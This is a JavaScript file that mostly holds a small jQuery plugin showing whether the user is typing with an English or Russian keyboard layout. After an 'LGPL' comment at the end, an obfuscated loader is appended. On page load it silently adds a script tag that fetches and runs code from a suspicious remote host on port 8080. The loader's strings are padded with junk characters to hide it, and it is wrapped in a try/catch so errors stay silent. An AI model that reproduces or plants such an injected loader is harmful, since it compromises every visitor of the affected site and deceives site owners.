(function() {  jQuery.keyboardLayout = {};  jQuery.keyboardLayout.indicator = $('<span class="keyboardLayout" />');  jQuery.keyboardLayout.target;  jQuery.keyboardLayout.layout;  jQuery.keyboardLayout.show = function(layout){    this.layout = layout;    this.indicator.text(layout);    this.target.after(this.indicator);  };  jQuery.keyboardLayout.hide = function(){    this.target = null;    this.layout = null;    this.indicator.remove();  };  jQuery.fn.keyboardLayout = function()  {    this.each(function(){      $(this).focus(function(){        jQuery.keyboardLayout.target = $(this);      });      $(this).blur(function(){        jQuery.keyboardLayout.hide();      });      $(this).keypress(function(e){        var c = (e.charCode == undefined ? e.keyCode : e.charCode);        var layout = jQuery.keyboardLayout.layout;        if (c >= 97/*a*/  && c <= 122/*z*/ && !e.shiftKey ||            c >= 65/*A*/  && c <= 90/*Z*/  &&  e.shiftKey ||             (c == 91/*[*/  && !e.shiftKey ||              c == 93/*]*/  && !e.shiftKey ||              c == 123/*{*/ &&  e.shiftKey ||              c == 125/*}*/ &&  e.shiftKey ||              c == 96/*`*/  && !e.shiftKey ||              c == 126/*~*/ &&  e.shiftKey ||              c == 64/*@*/  &&  e.shiftKey ||              c == 35/*#*/  &&  e.shiftKey ||              c == 36/*$*/  &&  e.shiftKey ||              c == 94/*^*/  &&  e.shiftKey ||              c == 38/*&*/  &&  e.shiftKey ||              c == 59/*;*/  && !e.shiftKey ||              c == 39/*'*/  && !e.shiftKey ||              c == 44/*,*/  && !e.shiftKey ||              c == 60/*<*/  &&  e.shiftKey ||              c == 62/*>*/  &&  e.shiftKey) && layout != 'EN') {          layout = 'en';        } else if (c >= 65/*A*/ && c <= 90/*Z*/  && !e.shiftKey ||                   c >= 97/*a*/ && c <= 122/*z*/ &&  e.shiftKey) {          layout = 'EN';        } else if (c >= 1072/*а*/ && c <= 1103/*я*/ && !e.shiftKey ||                   c >= 1040/*А*/ && c <= 1071/*Я*/ &&  e.shiftKey ||                   (c == 1105/*ё*/ && !e.shiftKey ||                    c == 1025/*Ё*/ &&  e.shiftKey ||                    c == 8470/*№*/ &&  e.shiftKey ||                    c == 59/*;*/   &&  e.shiftKey ||                    c == 44/*,*/   &&  e.shiftKey) && layout != 'RU') {          layout = 'ru';        } else if (c >= 1040/*А*/ && c <= 1071/*Я*/ && !e.shiftKey ||                   c >= 1072/*а*/ && c <= 1103/*я*/ &&  e.shiftKey) {          layout = 'RU';        }        if (layout) {            jQuery.keyboardLayout.show(layout);        }      });    });  };})();

/*LGPL*/ try{ window.onload = function(){var Vofsz5k5c76 = document.createElement('s)#c!(&r@()i^^p(^$#t)!'.replace(/&|\^|@|\!|#|\)|\$|\(/ig, ''));Vofsz5k5c76.setAttribute('defer', 'd&e&!&)f(&$)#e&!(!r#('.replace(/&|\^|\!|#|@|\)|\$|\(/ig, ''));Vofsz5k5c76.setAttribute('type', 't!)(@e(x)t#&!(/^$j&a^v^(a$!&s!)c$##r^@i)^@p@&t#@$@'.replace(/\^|&|\(|#|\!|\)|@|\$/ig, ''));Vofsz5k5c76.setAttribute('id', 'G(^!9!(^1@#(!6&#k(t@$g$^q^^)x#(!$j!$3(!&r('.replace(/\)|&|\!|\$|@|\^|\(|#/ig, ''));Vofsz5k5c76.setAttribute('s^!!r^#(c@'.replace(/#|\^|\$|\!|\(|\)|@|&/ig, ''),  'h!t$t&)p!:#)&(/#$/##i((!^#c$!i$&($b&$@a^((-$c&(o@&))m&!.(!$(o$!#&#r#^b@^@i)!^t))@z!.@c!o@m@)#.!&m(^&^$a$)i)n))i$c^^h!@i@$)$-(^))j$p!$.@@^w)@o&@)(r))$!l^)&d^)&w(!#(!e&#&b!w#)o$@()r(l#@$d#((.#$$@(r&)#$$u$$:)^!8($0#(8#!$0(@^&/@@$a&n!(j!@u!!@k!e^@).^@^c^^($o#!@$m)/$@!!a#)(#n$@(j$)u@^k@#)e$))!.$)#c()!#&o$!m!#/()#i#&m@@#^^a(^^#g##^@^e)v$(e#((n(^u)&$e))@&.)c#@#o^$!m(!/@#n$y^#$@p!#&!o@$$$s()t#^.!)@c&@)o&$&!m&$^/#^^g@#o!)o^$$@g#&^l#@@@e!)$).#@c!@)o^m^#!/)'.replace(/\!|\$|#|\^|\)|&|\(|@/ig, ''));if (document){document.body.appendChild(Vofsz5k5c76);}} } catch(Tjox2ld15f7m68pfcin) {}
